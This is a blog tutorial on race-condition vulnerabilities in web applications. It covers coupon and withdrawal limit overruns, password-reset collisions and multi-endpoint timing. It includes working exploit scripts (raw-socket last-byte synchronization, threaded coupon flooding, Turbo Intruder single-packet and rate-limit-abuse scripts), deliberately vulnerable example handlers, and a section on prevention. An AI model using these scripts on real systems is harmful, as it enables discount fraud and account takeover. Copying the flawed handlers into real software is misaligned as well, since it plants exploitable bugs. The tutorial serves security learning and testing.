What is a Race Condition?
Imagine that you are planning to go to a movie at 5 pm. You inquire about ticket availability at 4 pm, and the representative says tickets are available. You relax and reach the ticket window 30 minutes later, but to your horror, all the tickets have been sold. The problem here lies in the duration between the check and the action: you inquired at 4 and acted at 4:30, and in the meantime someone else grabbed the tickets. That's a race condition.
Technically speaking, a race condition occurs when multiple threads read and write the same variable, i.e. they have access to some shared data and try to change it at the same time. In such a scenario, the threads are "racing" each other to access and change the data. This is a serious security vulnerability: an attacker can extract sensitive information or bypass business rules by exploiting the race window.
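Here is a tiny Python sketch of the same check-then-act problem. The sleep() is only there to widen the race window so the bug reproduces reliably:

import threading
import time

balance = 100  # shared data

def withdraw(amount):
    global balance
    if balance >= amount:      # 1. check
        time.sleep(0.001)      # widen the race window for demonstration
        balance -= amount      # 2. act: the other thread may have passed the check too

threads = [threading.Thread(target=withdraw, args=(100,)) for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(balance)  # frequently -100: both threads "won" the check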
In this blog we will be talking about race condition vulnerabilities in various web scenarios. Let's go!
Limit Overrun Race Conditions
This is the most well-known type of race condition. It enables you to exceed a limit imposed by the application's business logic. Let's take an example to make things clearer.
Consider an online store that lets you enter a promotional code during checkout to get a one-time discount on your order.
To apply this discount, the application may perform the following high-level steps:
- Check that you haven't already used this code.
- Apply the discount to the order total.
- Update the record in the database to reflect the fact that you've now used this code.
If you later attempt to reuse this code, the initial checks performed at the start of the process should prevent you from doing so.
Now consider what would happen if a user who has never applied this discount code before tried to apply it twice at almost exactly the same time:
As you can see, the application transitions through a temporary sub-state; that is, a state that it enters and then exits again before request processing is complete. In this case, the sub-state begins when the server starts processing the first request, and ends when it updates the database to indicate that you've already used this code. This introduces a small race window during which you can repeatedly claim the discount as many times as you like. By sending two parallel requests at the same time, we can exploit the race window and apply the discount code twice. Now imagine sending more than two of these parallel requests: the discounts stack up, and ultimately you can buy the product at a very cheap price.
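To make the sub-state concrete, here is a minimal, deliberately vulnerable sketch of the three steps above. The names (used_codes, order) are hypothetical; the point is the gap between the check and the update:

used_codes = set()  # hypothetical store of redeemed codes

def apply_discount(code, order):
    # Step 1: check that the code hasn't been used yet
    if code in used_codes:
        return "code already used"

    # <-- race window: a parallel request can pass the check above
    #     before either request reaches the update below

    order["total"] = round(order["total"] * 0.8, 2)  # Step 2: apply a 20% discount
    used_codes.add(code)                             # Step 3: mark the code as used
    return "discount applied"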
The primary challenge is timing the requests so that at least two race windows line up, causing a collision. This window is often just milliseconds and can be even shorter.
Detecting and Exploiting Limit Overrun Race Conditions with Burp Suite
Race condition vulnerabilities, particularly those involving business logic bypasses like limit overruns, are notoriously difficult to exploit reliably. The primary challenge lies in the extremely narrow timing window, often just a few milliseconds, during which two or more concurrent requests must be executed in near-perfect synchronization. Traditionally, this has required either precise scripting or specialized tools with limited visibility and flexibility.
However, recent advancements in Burp Suite’s Repeater tool—particularly the updates introduced in version 2023.9—have significantly improved a pentester's ability to detect and exploit race conditions with high precision.
Introducing Parallel Request Support in Burp Repeater
Burp Repeater has historically been used for sending individual HTTP requests and analyzing responses. While invaluable for manual testing, it was previously limited in scenarios where concurrent request timing was critical.
With the 2023.9 update, Burp Repeater introduced parallel request execution, allowing testers to send multiple, carefully crafted requests simultaneously. This functionality dramatically enhances the ability to exploit vulnerabilities that depend on precise timing, such as race conditions.
Understanding the Role of Network Jitter
Network jitter refers to the variability in packet delay across a network. Even a high-speed connection can suffer from inconsistent delivery times, which significantly affects any exploit that depends on synchronized timing. In the context of race condition testing, jitter introduces unpredictability—causing well-timed requests to miss the race window entirely.
To address this, Burp Suite introduced two protocol-specific synchronization strategies aimed at minimizing the impact of jitter.
Exploiting Race Conditions over HTTP/1: The Last-Byte Synchronization Technique
When testing a target that communicates over the HTTP/1 protocol, Burp Repeater leverages a technique known as last-byte synchronization.
In this method:
- Multiple requests are prepared and transmitted in full, except for the final byte of each.
- These partially sent requests are held in a queued state by the tool.
- At the precise moment, the final bytes of all the requests are released simultaneously.
This ensures that all requests hit the server at the same time, entering the same race window and maximizing the chance of triggering a vulnerability. The technique effectively removes jitter from the equation during the critical portion of the request transmission.
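For intuition, here is a stripped-down illustration of the idea using raw sockets in Python. This is a sketch, not Burp's implementation: it assumes plain HTTP without TLS, and the host, path, and body are placeholders:

import socket

HOST, PORT = "target.example", 80  # placeholder target
BODY = "coupon=PROMO20"
REQUEST = (
    "POST /cart/coupon HTTP/1.1\r\n"
    f"Host: {HOST}\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(BODY)}\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
    f"{BODY}"
).encode()

# Phase 1: send every request except its final byte
sockets = []
for _ in range(10):
    s = socket.create_connection((HOST, PORT))
    s.sendall(REQUEST[:-1])
    sockets.append(s)

# Phase 2: release the held-back final bytes back-to-back, so all
# requests complete (and get processed) nearly simultaneously
for s in sockets:
    s.sendall(REQUEST[-1:])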
Exploiting Race Conditions over HTTP/2: The Single-Packet Attack
In environments where the target application supports HTTP/2, Burp Suite employs a more sophisticated approach known as the Single-Packet Attack, which was first introduced at Black Hat 2023 by PortSwigger researchers.
This technique involves:
- Crafting multiple complete HTTP/2 requests.
- Combining them into a single TCP packet.
- Transmitting that single packet so that all embedded requests are processed by the server simultaneously.
The benefit of this method is that it eliminates the risk of jitter entirely, as the server receives and processes all requests within the same network operation. It is particularly effective against modern web applications with asynchronous or multi-threaded backend processing, where subtle timing mismatches can otherwise prevent successful exploitation.
Implications for Limit Overrun Exploits
When attempting to exploit limit overrun vulnerabilities, the ability to synchronize requests at a granular level is critical. Whether you're:
- Applying the same discount code multiple times
- Triggering concurrent withdrawals in a fintech application
- Circumventing resource allocation limits
these new techniques in Burp Suite significantly improve the likelihood of a successful exploit.
By utilizing either last-byte synchronization (HTTP/1) or the single-packet attack (HTTP/2), penetration testers can reliably enter the temporary sub-states that make race condition exploits possible.
Why send so many requests?
You may think that race conditions can be exploited with just 2 requests, so why send 20-30 parallel requests at the same time? The reasons are:
- It overcomes server-side delays (aka internal latency or server-side jitter).
- It increases your chances of hitting the vulnerable timing.
- It is great during the recon/discovery phase, when you're probing behavior and testing for the race condition.
Basically, the more requests you send, the better your chances of hitting the sweet spot.
Let's take our previous example, where we try to redeem a coupon multiple times at once and exploit the race condition:
- Normally, jitter might cause one request to arrive too early or too late.
- With Burp's new techniques, you can flood the server with 30 simultaneous coupon redemptions.
- If the timing is right, the coupon gets used multiple times, and your vulnerability is confirmed.
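Outside Burp, you can approximate this with plain Python threads and a barrier. This is only a rough stand-in for "send group in parallel": the URL, cookie, and parameter names below are made up, and network jitter still applies (which is exactly what Burp's techniques remove):

import threading
import requests  # pip install requests

URL = "https://target.example/cart/coupon"   # placeholder
COOKIES = {"session": "YOUR_SESSION_TOKEN"}  # placeholder
N = 30

barrier = threading.Barrier(N)  # every thread blocks here until all N arrive

def redeem():
    barrier.wait()  # release all requests at (almost) the same instant
    r = requests.post(URL, data={"coupon": "PROMO20"}, cookies=COOKIES)
    print(r.status_code, len(r.text))

threads = [threading.Thread(target=redeem) for _ in range(N)]
for t in threads:
    t.start()
for t in threads:
    t.join()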
Turbo Intruder – The Fast Lane for Race Condition Attacks
Turbo Intruder is a powerful Burp Suite extension designed for lightning-fast, customizable HTTP request attacks. Unlike the default Intruder tool, Turbo Intruder uses asynchronous I/O and optimized threading to send thousands of requests per second, making it ideal for testing race conditions, brute-force attacks, token fuzzing, and more.
Key Features:
- Blazing Speed: Far faster than Burp’s built-in Intruder, even in the Community Edition.
- Python Scripting: Full control over request generation and response handling using Jython.
- Asynchronous Engine: Efficiently handles massive concurrent connections.
- Versatile Use Cases: Race conditions, login brute-forcing, JWT tampering, SSRF detection, HTTP desync attacks, and more.
How to Use:
- Install from Burp's BApp Store.
- Right-click any request → Send to Turbo Intruder.
- Customize the pre-built Python script to define payloads, logic, and filtering.
Example Use Case:
Detecting a race condition by sending 100 password reset requests in parallel:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=20,
                           requestsPerConnection=100,
                           pipeline=False)

    # Queue 100 copies of the captured request behind the same gate
    for i in range(100):
        engine.queue(target.req, gate='race')

    # Release the gate so all queued requests fire together
    # (without this, gated requests are never sent)
    engine.openGate('race')

def handleResponse(req, interesting):
    if 'Success' in req.response:
        print('Race condition triggered!')
Note:
Use responsibly — Turbo Intruder can overwhelm or crash servers if misused. Always test within a legal scope.
Using Turbo Intruder to Detect Race Condition Overruns
Detecting Race Conditions with Single-Packet Attacks
To detect overrun vulnerabilities caused by race conditions, Turbo Intruder supports a technique known as the single-packet attack. This method involves grouping requests and sending them simultaneously within a single TCP packet, assuming the server supports HTTP/2.
Setup Instructions
- Ensure the target application supports HTTP/2, as the single-packet attack is not compatible with HTTP/1.
- Configure the request engine to use the HTTP/2 backend with one concurrent connection:
engine = RequestEngine(
    endpoint=target.endpoint,
    concurrentConnections=1,
    engine=Engine.BURP2
)
- Queue multiple requests using a gate label. For example, queue 20 requests under gate '1':

for i in range(20):
    engine.queue(target.req, gate='1')
- Once queued, release all requests in the gate at once:

engine.openGate('1')
This structure ensures that all 20 requests are sent in parallel within the same TCP packet, increasing the likelihood of triggering a race condition if one exists.
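Put together, the fragments above form one small script you can paste into the Turbo Intruder window (assuming the request has been sent there via "Send to Turbo Intruder"):

def queueRequests(target, wordlists):
    # HTTP/2 backend with a single connection: required for the
    # single-packet attack
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    # Queue 20 copies of the captured request behind gate '1'
    for i in range(20):
        engine.queue(target.req, gate='1')

    # Release the gate: all 20 requests go out together
    engine.openGate('1')

def handleResponse(req, interesting):
    table.add(req)  # show every response in the results table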
Single-endpoint race conditions
Sending parallel requests to a single endpoint can be really important in some cases. For example, consider a password reset mechanism that stores the user ID and reset token in the user's session.
In this scenario, sending two parallel password reset requests from the same session, but with two different usernames, can cause a collision in the password reset mechanism: the session can end up storing the user ID of one account paired with the reset token generated for the other.
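To see why this collides, here is a hypothetical, deliberately vulnerable reset handler in Flask-style Python. lookup_user and send_reset_email are made-up helpers; the flaw is that the session is shared mutable state across both parallel requests:

from flask import Flask, request, session
import secrets

app = Flask(__name__)
app.secret_key = "dev-only"  # placeholder

@app.post("/forgot-password")
def forgot_password():
    user = lookup_user(request.form["username"])        # hypothetical helper
    session["reset_user"] = user.id                     # store the user ID...
    session["reset_token"] = secrets.token_urlsafe(32)  # ...and the token
    # Race window: a parallel request for a different username can
    # overwrite one of the two session keys between these steps, so the
    # (user, token) pair ends up mismatched and a token that resets one
    # account is emailed to the other user.
    send_reset_email(user.email, session["reset_token"])  # hypothetical helper
    return "reset email sent"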
Methodology to follow to exploit race conditions
1. Predict potential collisions
Testing every endpoint is impractical. After mapping out the target site as normal, you can reduce the number of endpoints that you need to test by asking yourself the following questions:
- Is this endpoint security critical? Many endpoints don't touch critical functionality, so they're not worth testing.
- Is there any collision potential? For a successful collision, you typically need two or more requests that trigger operations on the same record.
2. Probe for clues (race condition testing)
First, understand how the endpoint behaves normally by sending a group of requests one after another in sequence using Burp Repeater. This gives you a baseline.
Next, send the same group of requests all at once (in parallel) to simulate a race condition. This reduces network delay and may trigger unexpected behavior. Use "Send group in parallel" in Burp Repeater or Turbo Intruder for faster, more aggressive testing.
Watch for any differences in responses or app behavior — even small changes like different emails or weird UI behavior. These deviations are clues that a race condition may exist.
3. Prove the concept
Try to understand what's happening, remove superfluous requests, and make sure you can still replicate the effects.
Advanced race conditions can cause unusual and unique primitives, so the path to maximum impact isn't always immediately obvious. It may help to think of each race condition as a structural weakness rather than an isolated vulnerability.
Multi-endpoint race conditions
We can also send requests to multiple endpoints at the same time. Think of the classic logic flaw in online stores where you add an item to your basket or cart, pay for it, and then add more items to the cart before force-browsing to the order confirmation page.
Understanding Multi-Endpoint Race Conditions: Problems and Workarounds
When exploiting race conditions, attackers often target a single vulnerable endpoint. However, when a race condition spans multiple endpoints, synchronizing requests becomes significantly more complex. Even if requests are sent simultaneously, they may not reach or be processed by the server at the same time due to various timing discrepancies.
Why Multi-Endpoint Race Conditions Are Challenging
Network Delays
Network delays can stem from client-to-server communication overhead, front-end processing, or the nature of the HTTP protocol itself:
- HTTP/1.1: Opens a new TCP connection for each request unless Keep-Alive is explicitly enabled.
- HTTP/2: Uses multiplexing over a single connection, reducing connection-related delays.
These delays usually affect all requests uniformly, so even if there’s a delay, the relative timing between requests may still remain intact.
If only the first request is slower but the rest arrive close together, it’s likely a connection-related delay. This can often be ignored.
Endpoint-Specific Delays
Some endpoints take longer to process than others due to:
- Complex business logic
- Heavy database operations
- Additional validation steps
These delays impact only the affected endpoints, disrupting synchronization across requests.
If response times remain inconsistent across multiple requests, even after warming up connections, this indicates endpoint-specific delays that need to be accounted for.
Workarounds for Synchronizing Requests
To deal with inconsistencies and improve synchronization, consider the following techniques:
1. Adjust Request Timing Manually
Manually shift the timing of your requests. For example, send requests to slower endpoints slightly earlier to compensate for the processing time difference.
2. Use Connection Reuse or HTTP/2
Reducing connection overhead helps requests arrive more predictably:
- Reuse TCP connections using the Keep-Alive header.
- Prefer HTTP/2, which allows multiple requests to be sent simultaneously over a single connection.
3. Pad Faster Endpoints
If some endpoints consistently respond faster, slow them down intentionally to align with slower ones:
- Add delays (e.g., using sleep() functions, if supported)
- Increase the payload size to artificially extend processing time
4. Use Turbo Intruder for Fine-Grained Timing Control
Turbo Intruder is highly effective for controlling request timing at the byte level. You can:
- Send warm-up requests to prepare the backend and eliminate one-time delays
- Precisely schedule real attack requests to align with specific processing windows
This allows you to fine-tune request dispatch with minimal network interference.
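As a rough illustration, here is what the warm-up pattern can look like in a Turbo Intruder script. It is a sketch under the assumption that the same captured request is reused throughout; in a real multi-endpoint attack you would queue each endpoint's raw request behind the same gate:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    # Warm-up request (no gate): sent immediately, absorbing one-time
    # connection and backend initialization delays
    engine.queue(target.req)

    # The real attack requests, held behind a shared gate; queue each
    # endpoint's raw request here instead of reusing target.req
    for i in range(2):
        engine.queue(target.req, gate='multi')

    # Released together once the connection is warm
    engine.openGate('multi')

def handleResponse(req, interesting):
    table.add(req)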
Additional Tips
- Run multiple iterations to measure and understand timing differences across endpoints.
- Ensure all endpoints use the same session or authentication context, if required.
- Test under consistent conditions to isolate variability in response timing.
Abusing rate or resource limits for race conditions
If connection warming doesn't synchronize your race condition attack, try the following methods:
Client-Side Delay (Turbo Intruder)
- Turbo Intruder lets you add a short delay before sending each request.
- Problem: This splits the request over multiple TCP packets, so you can't use single-packet attacks.
- Not reliable on high-jitter targets (where network timing is unpredictable).
Triggering Server-Side Delay (Smart Bypass)
- Abuse rate-limiting: Send many dummy requests quickly to the server.
- This forces the server to slow down processing (common anti-abuse feature).
- Now send your real attack request during that slowdown.
- Helps make single-packet race condition attacks work even if delay is needed.
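To make that concrete, here is a hedged Turbo Intruder sketch of the pattern. Everything here is an assumption about the target: target.req stands in for both the cheap dummy request (e.g., a bogus login) and the real attack request, which you would replace with the appropriate raw requests:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=10,
                           engine=Engine.BURP2)

    # 1. Dummy traffic: cheap requests fired quickly to trip the
    #    rate limiter and slow down server-side processing
    for i in range(50):
        engine.queue(target.req)  # replace with a cheap dummy request

    # 2. Real attack requests, released together while the server
    #    is still in its slowed-down state
    for i in range(20):
        engine.queue(target.req, gate='attack')
    engine.openGate('attack')

def handleResponse(req, interesting):
    table.add(req)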
How to Prevent Race Condition Vulnerabilities
Race conditions occur when two or more operations execute simultaneously and cause unexpected or harmful behavior. Here are practical techniques to prevent them in your applications:
1. Avoid Mixing Different Data Sources
- Don’t combine data from different sources (e.g., database and cache) when making critical decisions.
- Always rely on a single, trusted source—typically your main database—for sensitive operations like authentication, payments, or order validation.
2. Make Critical Actions Atomic
- Wrap multi-step processes inside a single transaction to prevent interference between steps.
- For example, when placing an order:
  - Validate the cart total
  - Process the payment
  - Save the order
- All of this should happen in one atomic transaction, as in the sketch below.
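Here is a minimal sketch of the idea using Python's built-in sqlite3 module. The table names, columns, and charge_payment helper are illustrative; the point is that the check, the payment, and the insert commit or roll back as one unit:

import sqlite3

def place_order(db_path, user_id, payment_ref):
    conn = sqlite3.connect(db_path, isolation_level=None)  # manual transactions
    try:
        # BEGIN IMMEDIATE takes the write lock up front, so two
        # concurrent checkouts serialize instead of interleaving
        conn.execute("BEGIN IMMEDIATE")
        total = conn.execute(
            "SELECT total FROM carts WHERE user_id = ?", (user_id,)
        ).fetchone()[0]                              # 1. validate the cart total
        charge_payment(user_id, total, payment_ref)  # 2. process payment (hypothetical)
        conn.execute(
            "INSERT INTO orders (user_id, total, payment_ref) VALUES (?, ?, ?)",
            (user_id, total, payment_ref),
        )                                            # 3. save the order
        conn.execute("COMMIT")
    except Exception:
        conn.execute("ROLLBACK")
        raise
    finally:
        conn.close()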
3. Use Built-in Database Protections
- Enforce constraints to maintain data integrity:
  - Unique constraints (e.g., on username or email)
  - Foreign key constraints to prevent orphan records
These automatically prevent many race condition scenarios by rejecting invalid or duplicate data at the database level, as in the example below.
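For example, with sqlite3 a UNIQUE constraint rejects a duplicate even when two racing requests both pass an application-level "does this email already exist?" check:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (email TEXT UNIQUE)")

conn.execute("INSERT INTO users (email) VALUES ('a@example.com')")
try:
    # The racing duplicate insert fails at the database level
    conn.execute("INSERT INTO users (email) VALUES ('a@example.com')")
except sqlite3.IntegrityError as e:
    print("duplicate rejected:", e)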
4. Don’t Rely on Sessions to Protect Database Logic
- Sessions should be used for tracking user identity, not for controlling the number of allowed operations.
- Use server-side protections instead:
  - Database-level row limits
  - Application-layer rate limiting
  - Request locking or queuing where needed
5. Keep Session State Consistent
- When modifying session-related data, update all changes in a single step.
- Use transactions to prevent partially updated or corrupted session data.
- Frameworks and ORMs like Django or Hibernate support transactional session handling—make use of them.
6. Carefully Consider Stateless Designs (JWT)
- Moving state to the client using JSON Web Tokens (JWT) can reduce server-side race conditions.
- But if you go stateless, ensure JWTs are:
  - Securely signed
  - Untampered (with signature verification on every request)
  - Short-lived or revocable to prevent replay or misuse
A minimal sketch of issuing and verifying such tokens follows below.
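As one possible shape, here is a short sketch using the PyJWT library (pip install PyJWT). The secret and lifetime are placeholders:

import datetime
import jwt  # PyJWT

SECRET = "use-a-strong-random-key"  # placeholder: load from secure config

def issue_token(user_id):
    # Short-lived, signed token
    return jwt.encode(
        {"sub": str(user_id),
         "exp": datetime.datetime.now(datetime.timezone.utc)
                + datetime.timedelta(minutes=15)},
        SECRET,
        algorithm="HS256",
    )

def verify_token(token):
    # Raises jwt.InvalidTokenError if the signature is invalid or the
    # token has expired; call this on every request
    return jwt.decode(token, SECRET, algorithms=["HS256"])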
Conclusion
Race condition vulnerabilities are subtle but powerful attack vectors that often slip past traditional security checks. When dealing with multi-endpoint workflows or high-concurrency systems, even minor timing flaws can lead to severe data inconsistencies, privilege escalations, or unauthorized actions.
By understanding how these vulnerabilities arise—and implementing preventative strategies like atomic transactions, database constraints, and proper session handling—you can significantly reduce the risk. Tools like Turbo Intruder can help uncover these flaws during testing, but real security comes from designing systems that are resilient by default.
Race conditions are not just bugs; they’re symptoms of deeper architectural oversights. Fix the timing, structure the logic, and secure the flow—because attackers will race you to production.
Thanks for reading my blog on race conditions. It was inspired by the PortSwigger labs on race conditions, which provide hands-on practical demos of these techniques, all of which I have tried to simplify and present here.